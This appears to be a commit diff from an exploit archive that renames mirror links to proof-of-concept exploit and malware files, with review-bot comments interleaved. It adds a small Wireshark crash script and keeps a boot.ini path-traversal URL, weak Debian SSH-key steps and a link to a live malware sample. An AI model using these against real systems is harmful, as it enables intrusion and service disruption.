{"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024}
|
||||
};
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lsa.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7701.zip (2009-lsa.zip)
|
||||
|
||||
# milw0rm.com [2009-01-08]
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : No CVE, no patch just 0Day
|
||||
# State : Critical
|
||||
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zimbraexploit_rubina119.zip
|
||||
# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip)
|
||||
|
||||
---------------Description-----------------
|
||||
|
||||
|
|
|
@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
|
|||
|
||||
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-35451.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10205.zip (2009-11-22-35451.zip)
|
|
@ -45,4 +45,4 @@ Not Vulnerable:
|
|||
Firefox 3.5.3 on Windows crashed once but not reliably.
|
||||
|
||||
PoC Packagetx:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE_ScaryMovie_Study.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip)
|
||||
|
|
|
@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on.
|
|||
|
||||
http://aluigi.org/poc/qtsslame.zip
|
||||
or
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/qtsslame.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14268.zip (qtsslame.zip)
|
||||
|
||||
|
||||
#######################################################################
|
||||
|
|
|
@ -9,7 +9,7 @@ Website : http://www.itsecteam.com
|
|||
Forum : http://forum.ITSecTeam.com
|
||||
---------------------------------------------------------------------------
|
||||
Advisory URL: http://itsecteam.com/en/papers/paper11.htm
|
||||
POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adb_poc.zip
|
||||
POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14761.zip (adb_poc.zip)
|
||||
---------------------------------------------------------------------------
|
||||
System Affected:
|
||||
Adobe Acrobat reader 7.x
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
|_| |_|\____/_/ \_\____/|____/
|
||||
|
||||
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15086.zip (moaub-23-exploit.zip)
|
||||
'''
|
||||
|
||||
'''
|
||||
|
|
|
@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc.
|
|||
|
||||
0day remote ftpd Denial-of-Service:
|
||||
http://cxib.net/stuff/glob-0day.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/glob-0day.c
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15215.c (glob-0day.c)
|
||||
|
||||
- --- 3. Fix ---
|
||||
Oracle 25.09.2010 CET: Being fixed in main codeline
|
||||
|
|
|
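Review bot: the context line `- --- 3. Fix ---` is dash-escaped the way text inside a PGP clearsigned message is, which suggests the mirror URL being edited here sits inside the signed body of the advisory. Any signature kept in the file will no longer verify against the modified text; place the mirror reference in a clearly marked EDB note outside the signed block, or state in the file that the body was altered after signing.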
@ -64,7 +64,7 @@ The effects of the problem can be:
|
|||
|
||||
|
||||
http://aluigi.org/poc/soliddb_1.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/soliddb_1.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15261.zip
|
||||
|
||||
#######################################################################
|
||||
|
||||
|
|
|
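Review bot: the replacement URL ending in `15261.zip` drops the original name without recording it, whereas the other renamed mirrors in this commit append the old filename in parentheses. Add `(soliddb_1.zip)` after the new URL so the link to the `http://aluigi.org/poc/soliddb_1.zip` original directly above it stays traceable.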
@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv
|
|||
|
||||
This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1.
|
||||
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676_pcap.zip
|
||||
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676-pcap.zip
|
|
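Review bot: The PoC link only swaps the underscore for a hyphen (15676_pcap.zip to 15676-pcap.zip), which does not follow the id-plus-extension form with the original name in parentheses that the other links in this commit use. Either name it 15676.zip (15676_pcap.zip) or state that the suffix is intentional, and confirm the hyphenated file exists in the binary repository, since the old URL stops resolving once the file is renamed.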
@ -93,7 +93,7 @@ memory location:
|
|||
|
||||
|
||||
http://aluigi.org/testz/udpsz.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15707.zip (udpsz.zip)
|
||||
|
||||
udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
|
||||
|
||||
|
|
|
@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l
|
|||
|
||||
Wireshark 1.4.0 to 1.4.1 are vulnerable.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/44986.pcap
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15973.pcap (44986.pcap)
|
|
@ -18,5 +18,5 @@ Author: Luigi Auriemma
|
|||
|
||||
#######################################################################
|
||||
|
||||
Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-openttdx.zip
|
||||
Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1709.zip (04232006-openttdx.zip)
|
||||
|
||||
|
|
|
@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar');
|
|||
|
||||
?>
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.phar.tar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17201.phar.tar (poc.phar.tar)
|
|
@ -1,5 +1,5 @@
|
|||
# libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-libextho.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1801.zip (05172006-libextho.zip)
|
||||
|
||||
# milw0rm.com [2006-05-17]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05232006-panza.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
|
||||
|
||||
# milw0rm.com [2006-05-23]
|
||||
|
|
|
@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl
|
|||
pucik[@]overflow.pl
|
||||
http://overflow.pl
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10172006-clam_petite_heap.exe.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
|
||||
|
||||
# milw0rm.com [2006-10-17]
|
||||
|
|
|
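Review bot: The added link line opens a parenthesis before 10172006-clam_petite_heap.exe.bz2 and never closes it. Add the closing ")" so the annotation matches the other entries and a URL extractor does not treat the rest of the line as part of the filename.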
@ -1,5 +1,5 @@
|
|||
Sophos Antivirus CHM File Heap Overflow Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_chunkheap.chm
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2910.chm (12092006-sophos_chunkheap.chm)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_namelen.chm
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
Multiple Vendor Antivirus RAR File Denial of Service Vulnerability
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12102006-sophos_intifiniti.rar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2912.rar (12102006-sophos_intifiniti.rar)
|
||||
|
||||
# milw0rm.com [2006-12-10]
|
||||
|
|
30
platforms/multiple/dos/36840.py
Executable file
30
platforms/multiple/dos/36840.py
Executable file
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/python
|
||||
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
|
||||
# AUTHOR: Avinash Kumar Thapa "-Acid"
|
||||
# Date of Testing: 26th April'2015
|
||||
# Vendor Homepage: http://www.wireshark.org
|
||||
# Tested On : Windows 8.1 Pro
|
||||
# Steps to Reproduce the Crash
|
||||
# Step 1: Create a File Using PoC
|
||||
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
|
||||
# Step 3: Click "Apply"
|
||||
# Some other places for the Crash are:
|
||||
# Statistics > IP Statistics then any of the field you can use.
|
||||
# Statistics > Packet Length > Paste the buffer in the field
|
||||
# Statistics > ANCP
|
||||
# Statistics > Collectd
|
||||
# Statistics > Compared
|
||||
# Statistis >
|
||||
|
||||
|
||||
buffer = "A"*80000
|
||||
|
||||
file = open("wireshark.txt","w")
|
||||
file.write(buffer)
|
||||
file.close()
|
||||
|
||||
print "POC Created by -Acid"
|
||||
print " Email: acid.exploit@gmail.com"
|
||||
|
||||
|
||||
|
|
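Review bot: The header comments in the new 36840.py need a cleanup pass before merge: Step 2 spells the product "wirehshark", and the list of affected dialogs ends on a dangling "# Statistis >" with nothing after it, so the last reproduction location is lost. The script also runs only under Python 2 (print statements) and binds the name file, shadowing the builtin; a with open("wireshark.txt", "w") block would close the handle even when the write fails. The title claims all versions up to 1.12.4 while the header records a single test platform (Windows 8.1 Pro) and no vendor bug or CVE reference, so a maintainer triaging this has nothing to cross-check the version range against.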
@ -1,6 +1,6 @@
|
|||
Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit
|
||||
Author: RoMaNSoFt <roman@rs-labs.com>
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11022007-DoS-CVE-2007-5365.tgz
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz)
|
||||
|
||||
# milw0rm.com [2007-11-02]
|
||||
|
|
|
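Review bot: The parenthesised original name on the added line reads 1022007-DoS-CVE-2007-5365.tgz, but the removed line shows the file was 11022007-DoS-CVE-2007-5365.tgz. The leading "1" was dropped, which also breaks the MMDDYYYY prefix that agrees with the milw0rm date 2007-11-02 below; restore it so the old name stays searchable.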
@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500.
|
|||
|
||||
|
||||
http://aluigi.org/poc/asgulo.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-asgulo.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5229.zip (2008-asgulo.zip)
|
||||
|
||||
A]
|
||||
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
|
||||
|
|
|
@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected
|
|||
It is unknown at this time whether code execution is possible...
|
||||
"""
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-www.NoiseBridge.net.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6029.zip (2008-www.NoiseBridge.net.zip)
|
||||
|
||||
# milw0rm.com [2008-07-08]
|
||||
|
|
|
@ -17,6 +17,6 @@ your scanner hanging, woops.
|
|||
--
|
||||
kokanin
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snot.zip.bla
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6174.zip (2008-snot.zip.bla)
|
||||
|
||||
# milw0rm.com [2008-07-31]
|
||||
|
|
|
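Review bot: The renamed link shortens the extension from .zip.bla to .zip (6174.zip), while other multi-part extensions in this commit are kept whole (.tar.enc, .phar.tar, .exe.bz2). Confirm that 6174.zip is the name actually stored in the binary repository, and if the .bla suffix was there to stop the file being opened as an ordinary archive, keep it in the new name.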
@ -1,5 +1,5 @@
|
|||
NULL pointer in Ventrilo 3.0.2
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ventrilobotomy.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6237.zip (2008-ventrilobotomy.zip)
|
||||
|
||||
# milw0rm.com [2008-08-13]
|
||||
|
|
|
@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com)
|
|||
|
||||
|
||||
http://www.orange-bat.com/adv/2008/vlc.dos.tta
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vlc.dos.tta
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6252.tta (2008-vlc.dos.tta)
|
||||
|
||||
- - PGP -
|
||||
|
||||
|
|
|
@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture:
|
|||
Err file wtap.c: line 620 (wtap_read): assertion failed:
|
||||
(wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET)
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-wireshark.ncf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6622.ncf (2008-wireshark.ncf)
|
||||
|
||||
# milw0rm.com [2008-09-29]
|
||||
|
|
|
@ -2,6 +2,6 @@
|
|||
|
||||
// k`sOSe - works both in windows and linux
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ffox-poc.tar.gz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8285.tar.gz (2009-ffox-poc.tar.gz)
|
||||
|
||||
# milw0rm.com [2009-03-25]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
Acrobat <= 9.1.1 Stack Overflow Crashy PoC
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-crashy_the_clown.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8826.pdf (2009-crashy_the_clown.pdf)
|
||||
|
||||
# milw0rm.com [2009-05-29]
|
||||
|
|
|
@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
|
|||
VMWare ESX Server 3.5 ESX350-200910401
|
||||
VMWare ACE 2.5.3 Build 185404
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-vmware86.tar.gz
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz)
|
|
@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
|
|||
Ghostscript Ghostscript 8.54
|
||||
Ghostscript Ghostscript 8.15
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34340.ps
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps)
|
|
@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
|
|||
Avaya Intuity AUDIX LX 1.0
|
||||
Avaya Intuity AUDIX
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34337.pdf
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf)
|
||||
|
||||
|
|
|
@ -9,6 +9,6 @@ NOTE: This was taken out of live malware and was not modified. BEWARE.
|
|||
|
||||
By visiting the following link, you agree that you are responsible for any damages that occur.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe-0day-2010-1297.tar.enc
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)
|
||||
|
||||
|
||||
|
|
|
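Review bot: The link under the "taken out of live malware" warning still points at raw/master, so the content behind 13787.tar.enc can change without this entry changing, and the entry carries no digest to check the download against. For a sample the text itself flags as unmodified malware, record a SHA-256 next to the link or pin the URL to a commit, so an analyst can confirm the archive is the one this entry describes before handling it.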
@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
|
|||
os->flush();
|
||||
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
|
||||
|
||||
Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05162006-BL4CK-vncviewer-authbypass.rar
|
||||
Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
|
||||
|
||||
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
class101 - http://heapoverflow.com
|
||||
RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners
|
||||
---------------------------------------------------------------------
|
||||
windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-win32.rar
|
||||
linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-linux.tar.gz
|
||||
windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
|
||||
linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
|
||||
comments: http://heapoverflow.com/viewtopic.php?p=1729
|
||||
---------------------------------------------------------------------
|
||||
|
||||
|
|
|
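Review bot: The linux link now ends in 1799-2.rar, but the original name kept in parentheses is 05172006-VNC_bypauth-linux.tar.gz, so the extension no longer describes the archive format. Name it 1799-2.tar.gz unless the file was actually repacked, otherwise tools that pick an unpacker by extension will fail on it.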
@ -25,4 +25,4 @@ Enjoy :>
|
|||
|
||||
/Kingcope
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/tomcat-remote.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18619.zip (tomcat-remote.zip)
|
|
@ -1,3 +1,3 @@
|
|||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/x2.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
|
||||
|
||||
# milw0rm.com [2002-05-01]
|
||||
|
|
|
@ -70,7 +70,7 @@ vulnerability are in the fantasy of the attacker...
|
|||
|
||||
|
||||
http://aluigi.org/poc/sapone.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-sapone.zip
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4877.zip (2008-sapone.zip)
|
||||
|
||||
|
||||
#######################################################################
|
||||
|
|
|
@ -12,7 +12,7 @@ On an unpatched system, which doesn't need to be debian, do the following:
|
|||
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
|
||||
|
||||
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
|
||||
2. Extract it to a directory
|
||||
|
||||
|
|
|
@ -13,8 +13,8 @@
|
|||
#
|
||||
# Common Keys:
|
||||
#
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_dsa_1024_x86.tar.bz2
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
|
||||
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
||||
#
|
||||
#
|
||||
# Usage:
|
||||
|
|
|
@ -9,6 +9,6 @@
|
|||
# #
|
||||
#############################################################################
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snmpv3_exp.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5790.tgz (2008-snmpv3_exp.tgz)
|
||||
|
||||
# milw0rm.com [2008-06-12]
|
||||
|
|
|
@ -36,6 +36,6 @@ So, if you have a GigE lan, any trojaned machine can poison your DNS during one
|
|||
|
||||
original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-dns-bind.tgz
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6236.tgz (2008-dns-bind.tgz)
|
||||
|
||||
# milw0rm.com [2008-08-13]
|
||||
|
|
|
@ -87,4 +87,4 @@ For more information, please visit www.cybsec.com
|
|||
======================================================
|
||||
Download:
|
||||
======================================================
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf)
|
|
@ -94,4 +94,4 @@ For more information, please visit www.cybsec.com
|
|||
===========================================================================
|
||||
Download:
|
||||
===========================================================================
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf)
|
Some files were not shown because too many files have changed in this diff